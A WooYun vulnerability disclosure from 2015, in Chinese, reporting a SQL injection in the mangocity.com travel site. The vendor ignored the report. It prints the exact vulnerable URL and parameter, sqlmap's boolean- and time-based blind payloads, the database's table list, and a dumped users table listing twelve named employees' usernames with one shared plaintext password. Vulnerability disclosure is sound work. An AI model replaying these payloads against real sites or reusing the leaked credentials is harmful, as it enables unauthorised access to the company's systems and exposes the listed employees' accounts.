缺陷编号:WooYun-2015-0124848
漏洞标题:芒果网主站SQL注入(大量产品信息泄露+某表明文保存密码)
相关厂商:芒果网
漏洞作者:安全小飞侠
提交时间:2015-07-06 17:58
公开时间:2015-07-11 18:00
漏洞类型:SQL注射漏洞
危害等级:高
自评Rank:15
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
2015-07-06: 细节已通知厂商并且等待厂商处理中
2015-07-06: 厂商已查看当前漏洞内容,细节仅向厂商公开
2015-07-11: 厂商已经主动忽略漏洞,细节向公众公开
芒果网主站SQL注入(大量产品信息泄露+某表明文保存密码)
1 2 3 4 5 6 7 8 9 10 11 12 13 |
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=222292p2注入参数: thirdpartidGET parameter 'thirdpartid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br> sqlmap identified the following injection points with a total of 59 HTTP(s) requests:<br> ---<br> Parameter: thirdpartid (GET)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: thirdpartid=222292p2' AND 7974=7974 AND 'sVkC'='sVkCType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: thirdpartid=222292p2' AND (SELECT * FROM (SELECT(SLEEP(5)))BnJp) AND 'rusc'='rusc<br> ---<br> [12:06:03] [INFO] the back-end DBMS is MySQL<br> web application technology: PHP 5.3.28<br> back-end DBMS: MySQL 5.0.12 |
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30 31 32 33 34 35 36 37 38 39 40 41 42 43 44 45 46 47 48 49 50 |
Database: vacation_init<br> +-----------------------------+---------+<br> | Table | Entries |<br> +-----------------------------+---------+<br> | media | 120239 |<br> | product_detail_item | 74889 |<br> | product_journey | 41386 |<br> | album | 35244 |<br> | product_journey_album | 28033 |<br> | product_detail | 24963 |<br> | keyword | 17194 |<br> | product_arrival | 14728 |<br> | product_departure_month | 12257 |<br> | product_departure | 9594 |<br> | product_tag | 8797 |<br> | product | 8321 |<br> | product_extra | 8321 |<br> | product_album | 7211 |<br> | product_lineinfo | 5202 |<br> | pm_tui | 3125 |<br> | pm_tui_bak20150618 | 1962 |<br> | temp_update_product | 1787 |<br> | product_accommodation | 1458 |<br> | pm_params | 1268 |<br> | terms | 797 |<br> | product_theme | 598 |<br> | common_config | 415 |<br> | business_module_bak20150419 | 44 |<br> | business_module | 43 |<br> | product_scenery | 36 |<br> | users | 12 |<br> | business_type | 10 |<br> +-----------------------------+---------+Table: users<br> [12 entries]<br> +--------+-------------+-----------+<br> | roleId | username | password |<br> +--------+-------------+-----------+<br> | 0 | chenhuan | mango2015 |<br> | 0 | xujia | mango2015 |<br> | 0 | wuhongbo | mango2015 |<br> | 0 | sunbaoyu | mango2015 |<br> | 0 | songwanbing | mango2015 |<br> | 0 | renxianglin | mango2015 |<br> | 0 | pengwenhui | mango2015 |<br> | 0 | panwei | mango2015 |<br> | 0 | liuchunyan | mango2015 |<br> | 0 | cms | mango2015 |<br> | 0 | chenjie | mango2015 |<br> | 0 | zhanglan | mango2015 |<br> +--------+-------------+-----------+ |
1 2 3 4 5 6 7 8 9 10 11 12 13 |
http://www.mangocity.com/index.php/freeline/productinfo_controller/journey_print?thirdpartid=222292p2注入参数: thirdpartidGET parameter 'thirdpartid' is vulnerable. Do you want to keep testing the others (if any)? [y/N] N<br> sqlmap identified the following injection points with a total of 59 HTTP(s) requests:<br> ---<br> Parameter: thirdpartid (GET)<br> Type: boolean-based blind<br> Title: AND boolean-based blind - WHERE or HAVING clause<br> Payload: thirdpartid=222292p2' AND 7974=7974 AND 'sVkC'='sVkCType: AND/OR time-based blind<br> Title: MySQL >= 5.0.12 AND time-based blind (SELECT)<br> Payload: thirdpartid=222292p2' AND (SELECT * FROM (SELECT(SLEEP(5)))BnJp) AND 'rusc'='rusc<br> ---<br> [12:06:03] [INFO] the back-end DBMS is MySQL<br> web application technology: PHP 5.3.28<br> back-end DBMS: MySQL 5.0.12 |
你懂的
危害等级:无影响厂商忽略
忽略时间:2015-07-1118:00
漏洞Rank:15 (WooYun评价)
暂无
WooYun: 芒果网两处SQL注入(密码明文存储) 不是和6月30号的重复了么,怎么还通过了
原文连接
的情况下转载,若非则不得使用我方内容。